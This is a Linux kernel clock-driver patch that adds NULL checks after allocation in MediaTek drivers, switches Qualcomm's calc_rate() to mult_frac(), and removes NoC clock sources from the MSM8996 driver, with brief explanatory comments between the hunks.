++++ b/drivers/clk/mediatek/clk-mt2701.c
+@@ -670,6 +670,8 @@ static int mtk_topckgen_init(struct platform_device *pdev)
+ 		return PTR_ERR(base);
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_TOP_NR);
++	if (!clk_data)
++		return -ENOMEM;
+ 
+ 	mtk_clk_register_fixed_clks(top_fixed_clks, ARRAY_SIZE(top_fixed_clks),
+ 								clk_data);
+@@ -749,6 +751,8 @@ static void __init mtk_infrasys_init_early(struct device_node *node)
+ 
+ 	if (!infra_clk_data) {
+ 		infra_clk_data = mtk_alloc_clk_data(CLK_INFRA_NR);
++		if (!infra_clk_data)
++			return;
+ 
+ 		for (i = 0; i < CLK_INFRA_NR; i++)
+ 			infra_clk_data->hws[i] = ERR_PTR(-EPROBE_DEFER);
+@@ -776,6 +780,8 @@ static int mtk_infrasys_init(struct platform_device *pdev)
+ 
+ 	if (!infra_clk_data) {
+ 		infra_clk_data = mtk_alloc_clk_data(CLK_INFRA_NR);
++		if (!infra_clk_data)
++			return -ENOMEM;
+ 	} else {
+ 		for (i = 0; i < CLK_INFRA_NR; i++) {
+ 			if (infra_clk_data->hws[i] == ERR_PTR(-EPROBE_DEFER))
+@@ -893,6 +899,8 @@ static int mtk_pericfg_init(struct platform_device *pdev)
+ 		return PTR_ERR(base);
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_PERI_NR);
++	if (!clk_data)
++		return -ENOMEM;
+ 
+ 	mtk_clk_register_gates(node, peri_clks, ARRAY_SIZE(peri_clks),
+ 						clk_data);
+diff --git a/drivers/clk/mediatek/clk-mt6765.c b/drivers/clk/mediatek/clk-mt6765.c
+index 665981fc411f5..2c6a52ff5564e 100644
+--- a/drivers/clk/mediatek/clk-mt6765.c
++++ b/drivers/clk/mediatek/clk-mt6765.c
+@@ -738,6 +738,8 @@ static int clk_mt6765_apmixed_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_APMIXED_NR_CLK);
++	if (!clk_data)
++		return -ENOMEM;
+ 
+ 	mtk_clk_register_plls(node, plls, ARRAY_SIZE(plls), clk_data);
+ 
+@@ -773,6 +775,8 @@ static int clk_mt6765_top_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_TOP_NR_CLK);
++	if (!clk_data)
++		return -ENOMEM;
+ 
+ 	mtk_clk_register_fixed_clks(fixed_clks, ARRAY_SIZE(fixed_clks),
+ 				    clk_data);
+@@ -813,6 +817,8 @@ static int clk_mt6765_ifr_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_IFR_NR_CLK);
++	if (!clk_data)
++		return -ENOMEM;
+ 
+ 	mtk_clk_register_gates(node, ifr_clks, ARRAY_SIZE(ifr_clks),
+ 			       clk_data);
+diff --git a/drivers/clk/mediatek/clk-mt6779.c b/drivers/clk/mediatek/clk-mt6779.c
+index 0d0a90ee5eb2c..39dadc9547088 100644
+--- a/drivers/clk/mediatek/clk-mt6779.c
++++ b/drivers/clk/mediatek/clk-mt6779.c
+@@ -1218,6 +1218,8 @@ static int clk_mt6779_apmixed_probe(struct platform_device *pdev)
+ 	struct device_node *node = pdev->dev.of_node;
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_APMIXED_NR_CLK);
++	if (!clk_data)
++		return -ENOMEM;
+ 
+ 	mtk_clk_register_plls(node, plls, ARRAY_SIZE(plls), clk_data);
+ 
+@@ -1238,6 +1240,8 @@ static int clk_mt6779_top_probe(struct platform_device *pdev)
+ 		return PTR_ERR(base);
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_TOP_NR_CLK);
++	if (!clk_data)
++		return -ENOMEM;
+ 
+ 	mtk_clk_register_fixed_clks(top_fixed_clks, ARRAY_SIZE(top_fixed_clks),
+ 				    clk_data);
+diff --git a/drivers/clk/mediatek/clk-mt6797.c b/drivers/clk/mediatek/clk-mt6797.c
+index 78339cb35beb0..b362e99c8f53c 100644
+--- a/drivers/clk/mediatek/clk-mt6797.c
++++ b/drivers/clk/mediatek/clk-mt6797.c
+@@ -392,6 +392,8 @@ static int mtk_topckgen_init(struct platform_device *pdev)
+ 		return PTR_ERR(base);
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_TOP_NR);
++	if (!clk_data)
++		return -ENOMEM;
+ 
+ 	mtk_clk_register_factors(top_fixed_divs, ARRAY_SIZE(top_fixed_divs),
+ 				 clk_data);
+@@ -546,6 +548,8 @@ static void mtk_infrasys_init_early(struct device_node *node)
+ 
+ 	if (!infra_clk_data) {
+ 		infra_clk_data = mtk_alloc_clk_data(CLK_INFRA_NR);
++		if (!infra_clk_data)
++			return;
+ 
+ 		for (i = 0; i < CLK_INFRA_NR; i++)
+ 			infra_clk_data->hws[i] = ERR_PTR(-EPROBE_DEFER);
+@@ -571,6 +575,8 @@ static int mtk_infrasys_init(struct platform_device *pdev)
+ 
+ 	if (!infra_clk_data) {
+ 		infra_clk_data = mtk_alloc_clk_data(CLK_INFRA_NR);
++		if (!infra_clk_data)
++			return -ENOMEM;
+ 	} else {
+ 		for (i = 0; i < CLK_INFRA_NR; i++) {
+ 			if (infra_clk_data->hws[i] == ERR_PTR(-EPROBE_DEFER))
+diff --git a/drivers/clk/mediatek/clk-mt7629-eth.c b/drivers/clk/mediatek/clk-mt7629-eth.c
+index b0c8fa3b8bbec..e1d2635c72c10 100644
+--- a/drivers/clk/mediatek/clk-mt7629-eth.c
++++ b/drivers/clk/mediatek/clk-mt7629-eth.c
+@@ -79,6 +79,8 @@ static int clk_mt7629_ethsys_init(struct platform_device *pdev)
+ 	int r;
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_ETH_NR_CLK);
++	if (!clk_data)
++		return -ENOMEM;
+ 
+ 	mtk_clk_register_gates(node, eth_clks, CLK_ETH_NR_CLK, clk_data);
+ 
+@@ -101,6 +103,8 @@ static int clk_mt7629_sgmiisys_init(struct platform_device *pdev)
+ 	int r;
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_SGMII_NR_CLK);
++	if (!clk_data)
++		return -ENOMEM;
+ 
+ 	mtk_clk_register_gates(node, sgmii_clks[id++], CLK_SGMII_NR_CLK,
+ 			       clk_data);
+diff --git a/drivers/clk/mediatek/clk-mt7629.c b/drivers/clk/mediatek/clk-mt7629.c
+index 0bc88b7d171b5..01ee45fcd7e34 100644
+--- a/drivers/clk/mediatek/clk-mt7629.c
++++ b/drivers/clk/mediatek/clk-mt7629.c
+@@ -557,6 +557,8 @@ static int mtk_topckgen_init(struct platform_device *pdev)
+ 		return PTR_ERR(base);
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_TOP_NR_CLK);
++	if (!clk_data)
++		return -ENOMEM;
+ 
+ 	mtk_clk_register_fixed_clks(top_fixed_clks, ARRAY_SIZE(top_fixed_clks),
+ 				    clk_data);
+@@ -580,6 +582,8 @@ static int mtk_infrasys_init(struct platform_device *pdev)
+ 	struct clk_hw_onecell_data *clk_data;
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_INFRA_NR_CLK);
++	if (!clk_data)
++		return -ENOMEM;
+ 
+ 	mtk_clk_register_gates(node, infra_clks, ARRAY_SIZE(infra_clks),
+ 			       clk_data);
+@@ -603,6 +607,8 @@ static int mtk_pericfg_init(struct platform_device *pdev)
+ 		return PTR_ERR(base);
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_PERI_NR_CLK);
++	if (!clk_data)
++		return -ENOMEM;
+ 
+ 	mtk_clk_register_gates(node, peri_clks, ARRAY_SIZE(peri_clks),
+ 			       clk_data);
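
The string of MediaTek hunks all add the same missing guard: mtk_alloc_clk_data() can return NULL on allocation failure (it presumably kzallocs the clk_hw table, judging by its use here), and every probe previously dereferenced the result unconditionally. In a probe path the guard is simply:

	clk_data = mtk_alloc_clk_data(CLK_TOP_NR_CLK);
	if (!clk_data)
		return -ENOMEM;

while the early-init paths, which cannot return an errno, just bail out on failure.
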
+diff --git a/drivers/clk/qcom/Kconfig b/drivers/clk/qcom/Kconfig
+index 76e6dee450d59..cbf55949c6493 100644
+--- a/drivers/clk/qcom/Kconfig
++++ b/drivers/clk/qcom/Kconfig
+@@ -127,6 +127,7 @@ config IPQ_APSS_6018
+ 	tristate "IPQ APSS Clock Controller"
+ 	select IPQ_APSS_PLL
+ 	depends on QCOM_APCS_IPC || COMPILE_TEST
++	depends on QCOM_SMEM
+ 	help
+ 	  Support for APSS clock controller on IPQ platforms. The
+ 	  APSS clock controller manages the Mux and enable block that feeds the
+diff --git a/drivers/clk/qcom/clk-rcg2.c b/drivers/clk/qcom/clk-rcg2.c
+index 76551534f10df..dc797bd137caf 100644
+--- a/drivers/clk/qcom/clk-rcg2.c
++++ b/drivers/clk/qcom/clk-rcg2.c
+@@ -158,17 +158,11 @@ static int clk_rcg2_set_parent(struct clk_hw *hw, u8 index)
+ static unsigned long
+ calc_rate(unsigned long rate, u32 m, u32 n, u32 mode, u32 hid_div)
+ {
+-	if (hid_div) {
+-		rate *= 2;
+-		rate /= hid_div + 1;
+-	}
++	if (hid_div)
++		rate = mult_frac(rate, 2, hid_div + 1);
+ 
+-	if (mode) {
+-		u64 tmp = rate;
+-		tmp *= m;
+-		do_div(tmp, n);
+-		rate = tmp;
+-	}
++	if (mode)
++		rate = mult_frac(rate, m, n);
+ 
+ 	return rate;
+ }
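
calc_rate() previously doubled the rate in place for the half-integer HID divider and fell back to a u64 temporary plus do_div() for the M/N fraction. mult_frac(x, n, d) from include/linux/math.h handles both: it computes x * n / d as (x / d) * n + ((x % d) * n) / d, so the intermediate product cannot overflow an unsigned long even on 32-bit. The macro is approximately:

	#define mult_frac(x, numer, denom)(				\
	{								\
		typeof(x) quot = (x) / (denom);				\
		typeof(x) rem  = (x) % (denom);				\
		(quot * (numer)) + ((rem * (numer)) / (denom));		\
	}								\
	)

For example, mult_frac(1200000000UL, 5, 12) evaluates to 100000000 * 5 + 0 = 500000000, whereas the naive 1200000000 * 5 would wrap a 32-bit unsigned long.
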
+diff --git a/drivers/clk/qcom/gcc-msm8996.c b/drivers/clk/qcom/gcc-msm8996.c
+index e161637067351..ff5a16700ef71 100644
+--- a/drivers/clk/qcom/gcc-msm8996.c
++++ b/drivers/clk/qcom/gcc-msm8996.c
+@@ -245,71 +245,6 @@ static const struct clk_parent_data gcc_xo_gpll0_gpll4_gpll0_early_div[] = {
+ 	{ .hw = &gpll0_early_div.hw }
+ };
+ 
+-static const struct freq_tbl ftbl_system_noc_clk_src[] = {
+-	F(19200000, P_XO, 1, 0, 0),
+-	F(50000000, P_GPLL0_EARLY_DIV, 6, 0, 0),
+-	F(100000000, P_GPLL0, 6, 0, 0),
+-	F(150000000, P_GPLL0, 4, 0, 0),
+-	F(200000000, P_GPLL0, 3, 0, 0),
+-	F(240000000, P_GPLL0, 2.5, 0, 0),
+-	{ }
+-};
+-
+-static struct clk_rcg2 system_noc_clk_src = {
+-	.cmd_rcgr = 0x0401c,
+-	.hid_width = 5,
+-	.parent_map = gcc_xo_gpll0_gpll0_early_div_map,
+-	.freq_tbl = ftbl_system_noc_clk_src,
+-	.clkr.hw.init = &(struct clk_init_data){
+-		.name = "system_noc_clk_src",
+-		.parent_data = gcc_xo_gpll0_gpll0_early_div,
+-		.num_parents = ARRAY_SIZE(gcc_xo_gpll0_gpll0_early_div),
+-		.ops = &clk_rcg2_ops,
+-	},
+-};
+-
+-static const struct freq_tbl ftbl_config_noc_clk_src[] = {
+-	F(19200000, P_XO, 1, 0, 0),
+-	F(37500000, P_GPLL0, 16, 0, 0),
+-	F(75000000, P_GPLL0, 8, 0, 0),
+-	{ }
+-};
+-
+-static struct clk_rcg2 config_noc_clk_src = {
+-	.cmd_rcgr = 0x0500c,
+-	.hid_width = 5,
+-	.parent_map = gcc_xo_gpll0_map,
+-	.freq_tbl = ftbl_config_noc_clk_src,
+-	.clkr.hw.init = &(struct clk_init_data){
+-		.name = "config_noc_clk_src",
+-		.parent_data = gcc_xo_gpll0,
+-		.num_parents = ARRAY_SIZE(gcc_xo_gpll0),
+-		.ops = &clk_rcg2_ops,
+-	},
+-};
+-
+-static const struct freq_tbl ftbl_periph_noc_clk_src[] = {
+-	F(19200000, P_XO, 1, 0, 0),
+-	F(37500000, P_GPLL0, 16, 0, 0),
+-	F(50000000, P_GPLL0, 12, 0, 0),
+-	F(75000000, P_GPLL0, 8, 0, 0),
+-	F(100000000, P_GPLL0, 6, 0, 0),
+-	{ }
+-};
+-
+-static struct clk_rcg2 periph_noc_clk_src = {
+-	.cmd_rcgr = 0x06014,
+-	.hid_width = 5,
+-	.parent_map = gcc_xo_gpll0_map,
+-	.freq_tbl = ftbl_periph_noc_clk_src,
+-	.clkr.hw.init = &(struct clk_init_data){
+-		.name = "periph_noc_clk_src",
+-		.parent_data = gcc_xo_gpll0,
+-		.num_parents = ARRAY_SIZE(gcc_xo_gpll0),
+-		.ops = &clk_rcg2_ops,
+-	},
+-};
+-
+ static const struct freq_tbl ftbl_usb30_master_clk_src[] = {
+ 	F(19200000, P_XO, 1, 0, 0),
+ 	F(120000000, P_GPLL0, 5, 0, 0),
+@@ -1298,11 +1233,7 @@ static struct clk_branch gcc_mmss_noc_cfg_ahb_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_mmss_noc_cfg_ahb_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&config_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT | CLK_IGNORE_UNUSED,
++			.flags = CLK_IGNORE_UNUSED,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -1465,11 +1396,6 @@ static struct clk_branch gcc_usb_phy_cfg_ahb2phy_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_usb_phy_cfg_ahb2phy_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&periph_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -1499,11 +1425,6 @@ static struct clk_branch gcc_sdcc1_ahb_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_sdcc1_ahb_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&periph_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -1550,11 +1471,6 @@ static struct clk_branch gcc_sdcc2_ahb_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_sdcc2_ahb_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&periph_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -1584,11 +1500,6 @@ static struct clk_branch gcc_sdcc3_ahb_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_sdcc3_ahb_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&periph_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -1618,11 +1529,6 @@ static struct clk_branch gcc_sdcc4_ahb_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_sdcc4_ahb_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&periph_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -1636,11 +1542,6 @@ static struct clk_branch gcc_blsp1_ahb_clk = {
+ 		.enable_mask = BIT(17),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_blsp1_ahb_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&periph_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -1978,11 +1879,6 @@ static struct clk_branch gcc_blsp2_ahb_clk = {
+ 		.enable_mask = BIT(15),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_blsp2_ahb_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&periph_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -2319,11 +2215,6 @@ static struct clk_branch gcc_pdm_ahb_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_pdm_ahb_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&periph_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -2354,11 +2245,6 @@ static struct clk_branch gcc_prng_ahb_clk = {
+ 		.enable_mask = BIT(13),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_prng_ahb_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&config_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -2371,11 +2257,6 @@ static struct clk_branch gcc_tsif_ahb_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_tsif_ahb_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&periph_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -2423,11 +2304,6 @@ static struct clk_branch gcc_boot_rom_ahb_clk = {
+ 		.enable_mask = BIT(10),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_boot_rom_ahb_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&config_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -2521,11 +2397,6 @@ static struct clk_branch gcc_pcie_0_slv_axi_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_pcie_0_slv_axi_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&system_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -2538,11 +2409,6 @@ static struct clk_branch gcc_pcie_0_mstr_axi_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_pcie_0_mstr_axi_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&system_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -2555,11 +2421,6 @@ static struct clk_branch gcc_pcie_0_cfg_ahb_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_pcie_0_cfg_ahb_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&config_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -2607,11 +2468,6 @@ static struct clk_branch gcc_pcie_1_slv_axi_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_pcie_1_slv_axi_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&system_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -2624,11 +2480,6 @@ static struct clk_branch gcc_pcie_1_mstr_axi_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_pcie_1_mstr_axi_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&system_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -2641,11 +2492,6 @@ static struct clk_branch gcc_pcie_1_cfg_ahb_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_pcie_1_cfg_ahb_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&config_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -2693,11 +2539,6 @@ static struct clk_branch gcc_pcie_2_slv_axi_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_pcie_2_slv_axi_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&system_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -2710,11 +2551,6 @@ static struct clk_branch gcc_pcie_2_mstr_axi_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_pcie_2_mstr_axi_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&system_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -2727,11 +2563,6 @@ static struct clk_branch gcc_pcie_2_cfg_ahb_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_pcie_2_cfg_ahb_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&config_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -2779,11 +2610,6 @@ static struct clk_branch gcc_pcie_phy_cfg_ahb_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_pcie_phy_cfg_ahb_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&config_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -2830,11 +2656,6 @@ static struct clk_branch gcc_ufs_ahb_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_ufs_ahb_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&config_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -3061,11 +2882,7 @@ static struct clk_branch gcc_aggre0_snoc_axi_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_aggre0_snoc_axi_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&system_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT | CLK_IS_CRITICAL,
++			.flags = CLK_IS_CRITICAL,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -3078,11 +2895,7 @@ static struct clk_branch gcc_aggre0_cnoc_ahb_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_aggre0_cnoc_ahb_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&config_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT | CLK_IS_CRITICAL,
++			.flags = CLK_IS_CRITICAL,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -3095,11 +2908,7 @@ static struct clk_branch gcc_smmu_aggre0_axi_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_smmu_aggre0_axi_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&system_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT | CLK_IS_CRITICAL,
++			.flags = CLK_IS_CRITICAL,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -3112,11 +2921,7 @@ static struct clk_branch gcc_smmu_aggre0_ahb_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_smmu_aggre0_ahb_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&config_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT | CLK_IS_CRITICAL,
++			.flags = CLK_IS_CRITICAL,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -3163,10 +2968,6 @@ static struct clk_branch gcc_dcc_ahb_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_dcc_ahb_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&config_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -3179,10 +2980,6 @@ static struct clk_branch gcc_aggre0_noc_mpu_cfg_ahb_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_aggre0_noc_mpu_cfg_ahb_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&config_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -3195,11 +2992,6 @@ static struct clk_branch gcc_qspi_ahb_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_qspi_ahb_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&periph_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -3348,10 +3140,6 @@ static struct clk_branch gcc_mss_cfg_ahb_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_mss_cfg_ahb_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&config_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -3364,10 +3152,6 @@ static struct clk_branch gcc_mss_mnoc_bimc_axi_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_mss_mnoc_bimc_axi_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&system_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -3380,10 +3164,6 @@ static struct clk_branch gcc_mss_snoc_axi_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_mss_snoc_axi_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&system_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -3396,10 +3176,6 @@ static struct clk_branch gcc_mss_q6_bimc_axi_clk = {
+ 		.enable_mask = BIT(0),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_mss_q6_bimc_axi_clk",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&system_noc_clk_src.clkr.hw,
+-			},
+-			.num_parents = 1,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+@@ -3495,9 +3271,6 @@ static struct clk_regmap *gcc_msm8996_clocks[] = {
+ 	[GPLL0] = &gpll0.clkr,
+ 	[GPLL4_EARLY] = &gpll4_early.clkr,
+ 	[GPLL4] = &gpll4.clkr,
+-	[SYSTEM_NOC_CLK_SRC] = &system_noc_clk_src.clkr,
+-	[CONFIG_NOC_CLK_SRC] = &config_noc_clk_src.clkr,
+-	[PERIPH_NOC_CLK_SRC] = &periph_noc_clk_src.clkr,
+ 	[USB30_MASTER_CLK_SRC] = &usb30_master_clk_src.clkr,
